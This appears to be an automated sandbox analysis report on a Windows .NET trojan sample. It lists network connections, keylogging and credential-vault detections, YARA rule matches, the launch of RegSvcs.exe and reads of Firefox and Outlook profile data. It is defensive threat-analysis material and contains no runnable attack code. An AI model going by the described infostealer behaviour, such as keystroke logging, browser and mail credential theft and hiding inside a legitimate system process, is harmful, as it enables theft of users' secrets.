                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53137
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55411 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53140
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51421 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51463 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52594 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53218 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54918
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55205
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53233 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55201
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52049 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52060
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54086
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53246 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51417
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55557 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55427 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51418
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52060 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53594 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52588
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55584
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52592
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55512 -> 443
                      Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.8:51842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.8:52896 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.8:53182 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.8:55101 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, 5apE.cs.Net Code: zKS2DJy2
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, 5apE.cs.Net Code: zKS2DJy2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD4AC84_2_00FD4AC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FDED484_2_00FDED48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FDAD104_2_00FDAD10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD3EB04_2_00FD3EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD41F84_2_00FD41F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065BC1004_2_065BC100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065BA8684_2_065BA868
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D65C84_2_065D65C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065DB2184_2_065DB218
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D23584_2_065D2358
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D51784_2_065D5178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065DC1684_2_065DC168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D7D584_2_065D7D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D76784_2_065D7678
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065DB2084_2_065DB208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065DE3884_2_065DE388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D00404_2_065D0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D58C04_2_065D58C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_065D00064_2_065D0006
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: No import functions for PE file found
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename3b0f990c-a908-473c-b5a6-4b6fac711c4c.exe@ vs SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename3b0f990c-a908-473c-b5a6-4b6fac711c4c.exe@ vs SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000000.1512800837.00000194C4402000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMakeForever.exe8 vs SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.2049795050.00000194D679C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOwirinaveripog< vs SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeBinary or memory string: OriginalFilenameMakeForever.exe8 vs SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeSection loaded: cabinet.dllJump to behavior
                      Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, kPa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, xdFgn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, xdFgn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, zI2.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, zI2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@3/3@6/100
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeVirustotal: Detection: 31%
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeString found in binary or memory: -AddAcrossFILESUPERSEDE
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: 0xFB5ACD4E [Mon Aug 20 05:46:54 2103 UTC]

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 50
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 3080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 53299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 5022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 25007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 8888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 4228
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 8889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 2020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 4228 -> 50048
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 25007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 9445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 33466
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 7777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 33328
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 49524
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 53299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 25007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50334 -> 49579
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 60406
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 6764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50198
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 9741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 39796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50463 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 8000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 41866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 9002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50219
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 32650
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 17270
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50416 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50326 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 6467
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50480 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50604 -> 15419
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50601 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50449 -> 4145
